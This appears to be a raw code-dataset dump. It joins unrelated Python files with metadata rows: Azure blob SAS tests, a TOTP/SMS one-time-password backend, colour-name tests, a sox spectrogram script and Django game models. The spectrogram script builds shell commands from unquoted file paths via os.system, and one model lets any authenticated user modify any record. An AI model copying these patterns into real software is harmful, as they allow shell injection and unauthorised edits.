    bc = self.bc.with_filter(filter_a).with_filter(filter_b)
    bc.create_container(self.container_name + '1', None, None, False)
    self.assertEqual(called, ['b', 'a'])
    bc.delete_container(self.container_name + '1')
    self.assertEqual(called, ['b', 'a', 'b', 'a'])
def test_unicode_create_container_unicode_name(self):
    """Container names must be lowercase alphanumeric; unicode names fail."""
    # Arrange
    self.container_name = unicode(self.container_name) + u'啊齄丂狛狜'
    # Act
    with self.assertRaises(WindowsAzureError):
        # not supported - container name must be alphanumeric, lowercase
        self.bc.create_container(self.container_name)
    # Assert

def test_unicode_get_blob_unicode_name(self):
    """Blob names may contain unicode characters."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, '啊齄丂狛狜', 'hello world')
    # Act
    blob = self.bc.get_blob(self.container_name, '啊齄丂狛狜')
    # Assert
    self.assertIsInstance(blob, BlobResult)
    self.assertEquals(blob, 'hello world')

def test_unicode_get_blob_unicode_data(self):
    """Unicode blob content round-trips through put/get."""
    # Arrange
    self._create_container_and_block_blob(self.container_name, 'blob1', u'hello world啊齄丂狛狜')
    # Act
    blob = self.bc.get_blob(self.container_name, 'blob1')
    # Assert
    self.assertIsInstance(blob, BlobResult)
    self.assertEquals(blob, 'hello world啊齄丂狛狜')

def test_unicode_get_blob_binary_data(self):
    """Arbitrary binary content round-trips through put/get unchanged."""
    # Arrange
    # All byte values 0x00-0xFF repeated, base64-encoded for source safety.
    base64_data = 'AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/w=='
    binary_data = base64.b64decode(base64_data)
    self._create_container_and_block_blob(self.container_name, 'blob1', binary_data)
    # Act
    blob = self.bc.get_blob(self.container_name, 'blob1')
    # Assert
    self.assertIsInstance(blob, BlobResult)
    self.assertEquals(blob, binary_data)
def test_no_sas_private_blob(self):
    """Anonymous GET on a private blob returns ResourceNotFound, not the data."""
    # Arrange
    data = 'a private blob cannot be read without a shared access signature'
    self._create_container_and_block_blob(self.container_name, 'blob1.txt', data)
    res_path = self.container_name + '/blob1.txt'
    # Act
    host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
    url = '/' + res_path
    respbody = self._get_request(host, url)
    # Assert
    self.assertNotEquals(data, respbody)
    self.assertNotEquals(-1, respbody.find('ResourceNotFound'))

def test_no_sas_public_blob(self):
    """Anonymous GET works when the container has public 'blob' access."""
    # Arrange
    data = 'a public blob can be read without a shared access signature'
    self.bc.create_container(self.container_name, None, 'blob')
    self.bc.put_blob(self.container_name, 'blob1.txt', data, 'BlockBlob')
    res_path = self.container_name + '/blob1.txt'
    # Act
    host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
    url = '/' + res_path
    respbody = self._get_request(host, url)
    # Assert
    self.assertEquals(data, respbody)

def test_shared_read_access_blob(self):
    """A blob-scoped SAS with 'r' permission allows anonymous reads."""
    # Arrange
    data = 'shared access signature with read permission on blob'
    self._create_container_and_block_blob(self.container_name, 'blob1.txt', data)
    sas = SharedAccessSignature(credentials.getStorageServicesName(),
                                credentials.getStorageServicesKey())
    res_path = self.container_name + '/blob1.txt'
    res_type = RESOURCE_BLOB
    # Act
    sas.permission_set = [self._get_permission(sas, res_type, res_path, 'r')]
    web_rsrc = self._get_signed_web_resource(sas, res_type, res_path, 'r')
    host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
    url = web_rsrc.request_url
    respbody = self._get_request(host, url)
    # Assert
    self.assertEquals(data, respbody)

def test_shared_write_access_blob(self):
    """A blob-scoped SAS with 'w' permission allows anonymous overwrites."""
    # Arrange
    data = 'shared access signature with write permission on blob'
    updated_data = 'updated blob data'
    self._create_container_and_block_blob(self.container_name, 'blob1.txt', data)
    sas = SharedAccessSignature(credentials.getStorageServicesName(),
                                credentials.getStorageServicesKey())
    res_path = self.container_name + '/blob1.txt'
    res_type = RESOURCE_BLOB
    # Act
    sas.permission_set = [self._get_permission(sas, res_type, res_path, 'w')]
    web_rsrc = self._get_signed_web_resource(sas, res_type, res_path, 'w')
    host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
    url = web_rsrc.request_url
    respbody = self._put_request(host, url, updated_data)
    # Assert
    blob = self.bc.get_blob(self.container_name, 'blob1.txt')
    self.assertEquals(updated_data, blob)

def test_shared_delete_access_blob(self):
    """A blob-scoped SAS with 'd' permission allows anonymous deletes."""
    # Arrange
    data = 'shared access signature with delete permission on blob'
    self._create_container_and_block_blob(self.container_name, 'blob1.txt', data)
    sas = SharedAccessSignature(credentials.getStorageServicesName(),
                                credentials.getStorageServicesKey())
    res_path = self.container_name + '/blob1.txt'
    res_type = RESOURCE_BLOB
    # Act
    sas.permission_set = [self._get_permission(sas, res_type, res_path, 'd')]
    web_rsrc = self._get_signed_web_resource(sas, res_type, res_path, 'd')
    host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
    url = web_rsrc.request_url
    respbody = self._del_request(host, url)
    # Assert
    with self.assertRaises(WindowsAzureError):
        blob = self.bc.get_blob(self.container_name, 'blob1.txt')

def test_shared_access_container(self):
    """A container-scoped SAS grants read access to blobs inside it."""
    # Arrange
    data = 'shared access signature with read permission on container'
    self._create_container_and_block_blob(self.container_name, 'blob1.txt', data)
    sas = SharedAccessSignature(credentials.getStorageServicesName(),
                                credentials.getStorageServicesKey())
    res_path = self.container_name
    res_type = RESOURCE_CONTAINER
    # Act
    # Permission is granted at container scope but the signed URL targets a blob.
    sas.permission_set = [self._get_permission(sas, res_type, res_path, 'r')]
    web_rsrc = self._get_signed_web_resource(sas, res_type, res_path + '/blob1.txt', 'r')
    host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
    url = web_rsrc.request_url
    respbody = self._get_request(host, url)
    # Assert
    self.assertEquals(data, respbody)
#------------------------------------------------------------------------------
# Run the full test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 39.352528
| 1,392
| 0.650844
| 9,698
| 84,057
| 5.382656
| 0.053826
| 0.105094
| 0.128312
| 0.066589
| 0.834716
| 0.798989
| 0.741633
| 0.710063
| 0.674661
| 0.647516
| 0
| 0.017673
| 0.234638
| 84,057
| 2,135
| 1,393
| 39.37096
| 0.793717
| 0.059115
| 0
| 0.532582
| 0
| 0.000805
| 0.105023
| 0.029324
| 0
| 1
| 0
| 0.000468
| 0.311344
| 0
| null | null | 0.004827
| 0.010459
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
eec21dc3984ae642f408ff4ab866c692049f20c6
| 7,061
|
py
|
Python
|
applications/talos/directory/onetimepassword_credential.py
|
triflesoft/django-application-talos
|
73e697c60a4e3117a76b5d7e3f4aa0fca7cfa529
|
[
"BSD-3-Clause"
] | 2
|
2017-04-25T10:30:20.000Z
|
2017-09-16T05:17:36.000Z
|
applications/talos/directory/onetimepassword_credential.py
|
triflesoft/django-application-talos
|
73e697c60a4e3117a76b5d7e3f4aa0fca7cfa529
|
[
"BSD-3-Clause"
] | 4
|
2018-10-29T15:07:48.000Z
|
2018-10-29T15:15:41.000Z
|
applications/talos/directory/onetimepassword_credential.py
|
triflesoft/django-application-talos
|
73e697c60a4e3117a76b5d7e3f4aa0fca7cfa529
|
[
"BSD-3-Clause"
] | null | null | null |
class InternalGoogleAuthenticator(object):
    """TOTP (Google Authenticator style) credential backend for a directory.

    NOTE(review): depends on the project's OneTimePasswordCredential model and
    pyotp; descriptions below reflect only what this code visibly does.
    """
    def __init__(self, credential_directory, **kwargs):
        # The credential directory this backend creates/verifies credentials for.
        self._credential_directory = credential_directory

    def create_credentials(self, principal, credentials):
        """Create a TOTP credential for *principal* and return its stored salt.

        If the caller supplies credentials['salt'] it is reused and the
        credential is marked activated immediately; otherwise a fresh base32
        secret is generated (and is_activated is left at its model default).
        """
        from pyotp import random_base32
        from uuid import uuid4
        from ..models import _tzmin
        from ..models import _tzmax
        from ..models import OneTimePasswordCredential
        otp_credential = OneTimePasswordCredential()
        otp_credential.uuid = uuid4()
        otp_credential.principal = principal
        # Valid for the widest possible time window (model-defined min/max).
        otp_credential.valid_from = _tzmin()
        otp_credential.valid_till = _tzmax()
        otp_credential.directory = self._credential_directory
        if credentials.get('salt', None):
            base32_secret = credentials['salt']
            otp_credential.is_activated = True
        else:
            base32_secret = random_base32()
        # Stored as bytes; read back via .decode()/.tobytes() elsewhere.
        otp_credential.salt = base32_secret.encode()
        otp_credential.save()
        return otp_credential.salt

    def verify_credentials(self, principal, credentials):
        """Return True when credentials['code'] matches the stored TOTP secret."""
        from pyotp import TOTP
        from ..models import _tznow
        from ..models import OneTimePasswordCredential
        code = credentials['code']
        try:
            otp_credential = self._credential_directory.credentials.get(
                principal=principal,
                valid_from__lte=_tznow(),
                valid_till__gte=_tznow())
            secret_key = otp_credential.salt.decode()
            totp = TOTP(secret_key)
            # valid_window=1 tolerates one time step of clock drift either way.
            if totp.verify(code, valid_window=1):
                return True
        except OneTimePasswordCredential.DoesNotExist:
            pass
        return False

    def update_credentials(self, principal, old_credentials, new_credentials):
        """Replace the stored salt with new_credentials['salt']; True on success.

        NOTE(review): old_credentials is not verified here — presumably the
        caller has already authenticated the principal.
        """
        from ..models import _tznow
        from ..models import OneTimePasswordCredential
        try:
            otp_credential = self._credential_directory.credentials.get(
                principal=principal,
                valid_from__lte=_tznow(),
                valid_till__gte=_tznow())
            if new_credentials.get('salt', None):
                otp_credential.salt = new_credentials['salt'].encode()
                otp_credential.save()
                return True
        except OneTimePasswordCredential.DoesNotExist:
            pass
        return False

    def reset_credentials(self, super_principal, principal, credentials):
        """Delete the principal's active credential; True if one was removed."""
        from ..models import _tznow
        from ..models import OneTimePasswordCredential
        try:
            otp_credential = self._credential_directory.credentials.get(
                principal=principal,
                valid_from__lte=_tznow(),
                valid_till__gte=_tznow())
            otp_credential.delete()
            return True
        except OneTimePasswordCredential.DoesNotExist:
            pass
        return False

    def generate_credentials(self, principal, credentials):
        # Generation is not supported by this backend.
        return False

    def send_otp(self, principal, credential):
        # TOTP codes are generated client-side; nothing to send.
        pass

    def verify_otp(self, principal, credential, code):
        """Verify *code* against credential.salt with one time-step tolerance."""
        import pyotp
        # Type of salt is memoryview
        salt = credential.salt
        totp = pyotp.TOTP(salt.tobytes())
        return totp.verify(code, valid_window=1)
class InternalPhoneSMS(object):
    """TOTP-over-SMS credential backend.

    Secrets are stored base32-encoded in OneTimePasswordCredential.salt.
    Codes are generated and verified with a 200-second TOTP interval so a
    texted code stays valid long enough to be typed in.
    """

    def __init__(self, credential_directory, **kwargs):
        self._credential_directory = credential_directory

    def create_credentials(self, principal, credentials):
        """Create an OTP credential for *principal* and SMS the first code."""
        from uuid import uuid4
        from ..models import OneTimePasswordCredential
        from ..models import _tzmin
        from ..models import _tzmax
        from pyotp import random_base32
        from talos.contrib.sms_sender import SMSSender
        import pyotp

        otp_credential = OneTimePasswordCredential()
        otp_credential.uuid = uuid4()
        otp_credential.directory = self._credential_directory
        otp_credential.principal = principal
        otp_credential.valid_from = _tzmin()
        otp_credential.valid_till = _tzmax()
        base32_secret = random_base32()
        otp_credential.salt = base32_secret.encode()
        otp_credential.save()
        totp = pyotp.TOTP(otp_credential.salt, interval=200)
        sms_sender = SMSSender()
        sms_sender.send_message(principal.phone, 'Your code is {}'.format(totp.now()))

    def verify_credentials(self, principal, credentials):
        """Return True if credentials['code'] matches the current SMS code."""
        from ..models import _tznow
        from ..models import OneTimePasswordCredential
        from pyotp import TOTP

        code = credentials['code']
        try:
            otp_credential = self._credential_directory.credentials.get(
                principal=principal,
                valid_from__lte=_tznow(),
                valid_till__gte=_tznow())
            secret_key = otp_credential.salt.decode()
            totp = TOTP(secret_key, interval=200)
            # valid_window=1 also accepts the immediately adjacent time step.
            if totp.verify(code, valid_window=1):
                return True
        except OneTimePasswordCredential.DoesNotExist:
            pass
        return False

    def reset_credentials(self, super_principal, principal, credentials):
        """Delete the principal's OTP credential; True if one was removed."""
        from ..models import _tznow
        from ..models import OneTimePasswordCredential

        try:
            otp_credential = self._credential_directory.credentials.get(
                principal=principal,
                valid_from__lte=_tznow(),
                valid_till__gte=_tznow())
            otp_credential.delete()
            return True
        except OneTimePasswordCredential.DoesNotExist:
            pass
        return False

    def generate_credentials(self, principal, credentials):
        """Generate a fresh code for an existing credential and SMS it."""
        from ..models import _tznow
        from pyotp import TOTP
        from talos.models import OneTimePasswordCredential
        from ..contrib.sms_sender import SMSSender

        try:
            otp_credential = self._credential_directory.credentials.get(
                principal=principal,
                valid_from__lte=_tznow(),
                valid_till__gte=_tznow())
            secret_key = otp_credential.salt.decode()
            # BUGFIX: use the same 200-second interval as the rest of this
            # backend. With pyotp's default 30 s interval the code sent here
            # would (almost) never match what verify_credentials() checks.
            totp = TOTP(secret_key, interval=200)
            sms_sender = SMSSender()
            sms_sender.send_message(principal.phone, 'Your registration code is %s' % totp.now())
            return True
        except OneTimePasswordCredential.DoesNotExist:
            pass
        return False

    def send_otp(self, principal, credential):
        """SMS the current code for *credential* to the principal's phone."""
        import pyotp
        from ..contrib.sms_sender import SMSSender

        salt = credential.salt
        # salt may arrive as a memoryview from the database driver;
        # normalize to bytes like verify_otp does below.
        if isinstance(salt, memoryview):
            salt = salt.tobytes()
        totp = pyotp.TOTP(salt, interval=200)
        sms_sender = SMSSender()
        sms_sender.send_message(principal.phone, totp.now())

    def verify_otp(self, principal, credential, code):
        """Check *code* against *credential* (±1 time step of 200 s)."""
        import pyotp

        salt = credential.salt
        # Type of salt is memoryview when it comes from the database.
        if isinstance(salt, memoryview):
            salt = salt.tobytes()
        totp = pyotp.TOTP(salt, interval=200)
        return totp.verify(code, valid_window=1)
| 32.539171
| 96
| 0.633621
| 691
| 7,061
| 6.212735
| 0.120116
| 0.096902
| 0.063359
| 0.066853
| 0.863965
| 0.837876
| 0.772187
| 0.729327
| 0.683205
| 0.614256
| 0
| 0.007643
| 0.29585
| 7,061
| 216
| 97
| 32.689815
| 0.855792
| 0.010905
| 0
| 0.871951
| 0
| 0
| 0.009456
| 0
| 0
| 0
| 0
| 0.00463
| 0
| 1
| 0.091463
| false
| 0.140244
| 0.195122
| 0.006098
| 0.402439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e1252796df4cebad9091f060cc3e259838547f71
| 1,571
|
py
|
Python
|
tests/test_name_converter.py
|
stajc06/hue_sms
|
6b174e6a8ee516c91f697b158c1b325281caad40
|
[
"MIT"
] | 1
|
2021-11-16T17:55:54.000Z
|
2021-11-16T17:55:54.000Z
|
tests/test_name_converter.py
|
stajc06/hue_sms
|
6b174e6a8ee516c91f697b158c1b325281caad40
|
[
"MIT"
] | 9
|
2021-06-03T18:26:05.000Z
|
2022-02-11T15:59:15.000Z
|
tests/test_name_converter.py
|
stajc06/hue_sms
|
6b174e6a8ee516c91f697b158c1b325281caad40
|
[
"MIT"
] | 12
|
2018-03-17T13:59:20.000Z
|
2021-07-02T15:48:49.000Z
|
from name_converter import NameConverter, clean_name
# Reference RGB triples used as expected values by the tests below.
# (PEP 8 fix: consistent spacing after commas in red_orange.)
red = (237, 10, 63)
red_orange = (255, 104, 31)
robins_egg_blue = (0, 204, 204)
def test_clean_caps():
    """clean_name lower-cases its input regardless of capitalization."""
    for variant in ('Red', 'RED', 'red', 'ReD'):
        assert 'red' == clean_name(variant)
def test_clean_punctuation():
    """clean_name strips trailing punctuation."""
    for noisy in ('Red.', 'RED!', 'red?'):
        assert 'red' == clean_name(noisy)
def test_clean_whitespace():
    """clean_name strips surrounding spaces, tabs and newlines."""
    for padded in (' Red ', '\t\tRed\t\t', '\n\nRed\n\n'):
        assert 'red' == clean_name(padded)
def test_exact_spelling():
    """Exactly-spelled names resolve to their RGB triples."""
    converter = NameConverter()
    cases = (
        ('Red', red),
        ('Red-Orange', red_orange),
        ("Robin's Egg Blue", robins_egg_blue),
    )
    for name, rgb in cases:
        assert rgb == converter.convert(name)
def test_leading_and_trailing_space():
    """Surrounding whitespace does not affect name lookup."""
    converter = NameConverter()
    cases = (
        (' Red ', red),
        ('\nRed-Orange\n', red_orange),
        ("\t\tRobin's Egg Blue\t\t", robins_egg_blue),
    )
    for name, rgb in cases:
        assert rgb == converter.convert(name)
def test_different_cases():
    """Lookup is case-insensitive."""
    converter = NameConverter()
    cases = (
        ('RED', red),
        ('red-orange', red_orange),
        ("RoBin'S Egg blue", robins_egg_blue),
    )
    for name, rgb in cases:
        assert rgb == converter.convert(name)
def test_punctuation():
    """Trailing punctuation does not affect name lookup."""
    converter = NameConverter()
    cases = (
        ('Red.', red),
        ('Red-Orange!', red_orange),
        ("Robin's Egg Blue?", robins_egg_blue),
    )
    for name, rgb in cases:
        assert rgb == converter.convert(name)
| 29.092593
| 75
| 0.674729
| 207
| 1,571
| 4.917874
| 0.198068
| 0.159136
| 0.137525
| 0.176817
| 0.740668
| 0.740668
| 0.706287
| 0.706287
| 0.706287
| 0.667976
| 0
| 0.01691
| 0.171865
| 1,571
| 53
| 76
| 29.641509
| 0.765565
| 0
| 0
| 0.216216
| 0
| 0
| 0.140127
| 0
| 0
| 0
| 0
| 0
| 0.594595
| 1
| 0.189189
| false
| 0
| 0.027027
| 0
| 0.216216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0112b1e766c9dcfc592fc0a89eedb05ae26b8017
| 1,974
|
py
|
Python
|
chapter_15/make_augmented_spectrograms.py
|
haloway13/PracticalDeepLearningPython
|
c3760b17945c9389421c2970a3d16c6528fb7af6
|
[
"MIT"
] | 44
|
2021-02-25T00:52:04.000Z
|
2022-03-16T02:04:50.000Z
|
chapter_15/make_augmented_spectrograms.py
|
rkneusel9/PracticalDeepLearningWithPython
|
561004e76b3e0828a59952874443384c31b6d84e
|
[
"MIT"
] | null | null | null |
chapter_15/make_augmented_spectrograms.py
|
rkneusel9/PracticalDeepLearningWithPython
|
561004e76b3e0828a59952874443384c31b6d84e
|
[
"MIT"
] | 18
|
2021-03-18T11:22:18.000Z
|
2022-03-08T21:10:42.000Z
|
#
# file: make_augmented_spectrograms.py
#
# Use sox to make the spectrogram images.
#
# RTK, 11-Nov-2019
# Last update: 11-Nov-2019
#
################################################################
import os
import numpy as np
from PIL import Image
rows = 100
cols = 160

def build_split(filelist_path, out_prefix):
    """Render, crop and save spectrograms for one dataset split.

    For every ``<path> <label>`` line in *filelist_path*: run sox to render
    a spectrogram PNG, crop away sox's axes/legend, resize to (cols, rows),
    and collect the image, integer label and absolute source path. The
    arrays are shuffled together and written to ``<out_prefix>_images.npy``,
    ``<out_prefix>_labels.npy`` and ``<out_prefix>_paths.npy``.
    """
    # splitlines() (instead of line[:-1]) is safe when the file lacks a
    # trailing newline; `with` closes the file handle deterministically.
    with open(filelist_path) as fh:
        flist = fh.read().splitlines()
    n = len(flist)
    img = np.zeros((n, rows, cols, 3), dtype="uint8")
    lbl = np.zeros(n, dtype="uint8")
    paths = []
    for i, entry in enumerate(flist):
        src, label = entry.split()
        # NOTE(review): shell interpolation — assumes paths in the filelist
        # contain no spaces or shell metacharacters.
        os.system("sox %s -n spectrogram" % src)
        im = np.array(Image.open("spectrogram.png").convert("RGB"))
        im = im[42:542, 58:858, :]  # crop away sox's axes and legend
        im = Image.fromarray(im).resize((cols, rows))
        img[i, :, :, :] = np.array(im)
        lbl[i] = int(label)
        paths.append(os.path.abspath(src))
        os.system("rm -rf spectrogram.png")
    paths = np.array(paths)
    # Shuffle all three arrays with the same random permutation.
    idx = np.argsort(np.random.random(n))
    np.save(out_prefix + "_images.npy", img[idx])
    np.save(out_prefix + "_labels.npy", lbl[idx])
    np.save(out_prefix + "_paths.npy", paths[idx])

# train
build_split("../data/audio/ESC-10/augmented_train_filelist.txt",
            "../data/audio/ESC-10/esc10_spect_train")

# test
build_split("../data/audio/ESC-10/augmented_test_filelist.txt",
            "../data/audio/ESC-10/esc10_spect_test")
| 27.416667
| 83
| 0.627153
| 337
| 1,974
| 3.602374
| 0.252226
| 0.059308
| 0.079077
| 0.092257
| 0.847611
| 0.847611
| 0.847611
| 0.847611
| 0.847611
| 0.825371
| 0
| 0.043453
| 0.137285
| 1,974
| 71
| 84
| 27.802817
| 0.669407
| 0.067376
| 0
| 0.745098
| 0
| 0
| 0.29932
| 0.218821
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
01879ce17c96c92433461fece65cdf2c94744ac8
| 3,628
|
py
|
Python
|
backend/restful_api/models.py
|
dschmide/proofofkortzept
|
b3d7201a0178c6a3752d9f02461fa9bc11aa9163
|
[
"MIT"
] | null | null | null |
backend/restful_api/models.py
|
dschmide/proofofkortzept
|
b3d7201a0178c6a3752d9f02461fa9bc11aa9163
|
[
"MIT"
] | 37
|
2018-10-24T15:51:28.000Z
|
2019-01-17T15:10:02.000Z
|
backend/restful_api/models.py
|
dschmide/proof_of_kort-cept
|
b3d7201a0178c6a3752d9f02461fa9bc11aa9163
|
[
"MIT"
] | null | null | null |
from django.contrib.gis.db import models
from django.contrib.auth import get_user_model
# Array Field for Tower locations
from django.contrib.postgres.fields import ArrayField
# Resolve the active user model (honours AUTH_USER_MODEL); used as the
# target of every `creator` foreign key below.
User = get_user_model()
class PlacedLandmark(models.Model):
    """A user-placed landmark.

    ``location`` is a 2-element array of high-precision decimals —
    presumably [latitude, longitude]; confirm against the frontend.
    The ``has_*_permission`` methods match the dry-rest-permissions hook
    naming — confirm which permission library consumes them.
    """
    location = ArrayField(models.DecimalField(max_digits=18, decimal_places=15), size=2)
    label = models.CharField(max_length=99)
    owner = models.CharField(max_length=99)
    # Deleting the user cascades to their landmarks.
    creator = models.ForeignKey(User, on_delete=models.CASCADE)
    class Meta:
        ordering = ('creator',)
    @staticmethod
    def has_read_permission(request):
        # Landmarks are publicly readable.
        return True
    def has_object_read_permission(self, request):
        return True
    @staticmethod
    def has_create_permission(request):
        return True
    @staticmethod
    def has_write_permission(request):
        # Any write requires authentication...
        return request.user.is_authenticated
    def has_object_write_permission(self, request):
        # ...and modifying a specific landmark requires being its creator.
        return request.user == self.creator
class PlacedTower(models.Model):
    """A user-placed tower.

    Unlike PlacedLandmark, reading towers requires authentication.
    ``location`` is a 2-element decimal array — presumably
    [latitude, longitude]; confirm against the frontend.
    """
    location = ArrayField(models.DecimalField(max_digits=18, decimal_places=15), size=2)
    # Deleting the user cascades to their towers.
    creator = models.ForeignKey(User, on_delete=models.CASCADE)
    class Meta:
        ordering = ('creator',)
    @staticmethod
    def has_read_permission(request):
        return request.user.is_authenticated
    def has_object_read_permission(self, request):
        return request.user.is_authenticated
    @staticmethod
    def has_create_permission(request):
        return True
    @staticmethod
    def has_write_permission(request):
        return request.user.is_authenticated
    def has_object_write_permission(self, request):
        # Only the creator may modify a specific tower.
        return request.user == self.creator
class UserAttributes(models.Model):
    """Per-user game state: currency, experience, counters and ranges.

    All numeric fields are integer-valued DecimalFields (decimal_places=0)
    defaulting to 0.
    """
    koins = models.DecimalField(default=0, max_digits=10, decimal_places=0)
    experience = models.DecimalField(default=0, max_digits=10, decimal_places=0)
    towers = models.DecimalField(default=0, max_digits=10, decimal_places=0)
    landmarks = models.DecimalField(default=0, max_digits=10, decimal_places=0)
    # Deleting the user removes their attribute row.
    creator = models.ForeignKey(User, on_delete=models.CASCADE)
    tower_range = models.DecimalField(default=0, max_digits=10, decimal_places=0)
    sight_range = models.DecimalField(default=0, max_digits=10, decimal_places=0)
    class Meta:
        ordering = ('creator',)
    @staticmethod
    def has_read_permission(request):
        return request.user.is_authenticated
    def has_object_read_permission(self, request):
        return request.user.is_authenticated
    @staticmethod
    def has_create_permission(request):
        return True
    @staticmethod
    def has_write_permission(request):
        return request.user.is_authenticated
    def has_object_write_permission(self, request):
        # Only the owning user may change their own stats.
        return request.user == self.creator
class solvedMission(models.Model):
    """Record of a solved mission attached to an OSM element.

    NOTE(review): the class name breaks PascalCase but is kept as-is —
    renaming would require a migration and touches external references.
    ``timestamp`` is a 16-digit integer — presumably epoch milliseconds;
    confirm with the code that writes it.
    """
    osmID = models.DecimalField(default=0, max_digits=10, decimal_places=0)
    answer = models.CharField(max_length=99)
    # NOTE(review): default=0 on a CharField is suspicious — presumably
    # should be '' (or the string '0'); confirm intended default.
    solved_by = models.CharField(default=0, max_length=99)
    timestamp = models.DecimalField(default=0, max_digits=16, decimal_places=0)
    creator = models.ForeignKey(User, on_delete=models.CASCADE)
    class Meta:
        ordering = ('osmID', 'creator')
    @staticmethod
    def has_read_permission(request):
        return True
    def has_object_read_permission(self, request):
        return True
    @staticmethod
    def has_create_permission(request):
        return True
    @staticmethod
    def has_write_permission(request):
        return request.user.is_authenticated
    def has_object_write_permission(self, request):
        # NOTE(review): unlike the other models here, ANY authenticated user
        # may modify a solved mission (no creator check) — confirm this is
        # intentional.
        return request.user.is_authenticated
| 29.495935
| 88
| 0.727122
| 441
| 3,628
| 5.773243
| 0.170068
| 0.047133
| 0.084839
| 0.113119
| 0.858209
| 0.827573
| 0.813826
| 0.813826
| 0.807934
| 0.807934
| 0
| 0.017288
| 0.18688
| 3,628
| 122
| 89
| 29.737705
| 0.845763
| 0.008545
| 0
| 0.755814
| 0
| 0
| 0.009179
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.232558
| false
| 0
| 0.034884
| 0.232558
| 0.802326
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 9
|
6d9b694294fe2dea4671f7a7c521102f5bc2fe98
| 10,398
|
py
|
Python
|
p013.py
|
anadahalli/project-euler
|
d4150a5a6c54cf9f4edcd024df69b01bf03c2a10
|
[
"CC0-1.0"
] | 1
|
2017-02-03T15:37:42.000Z
|
2017-02-03T15:37:42.000Z
|
p013.py
|
anadahalli/project-euler
|
d4150a5a6c54cf9f4edcd024df69b01bf03c2a10
|
[
"CC0-1.0"
] | null | null | null |
p013.py
|
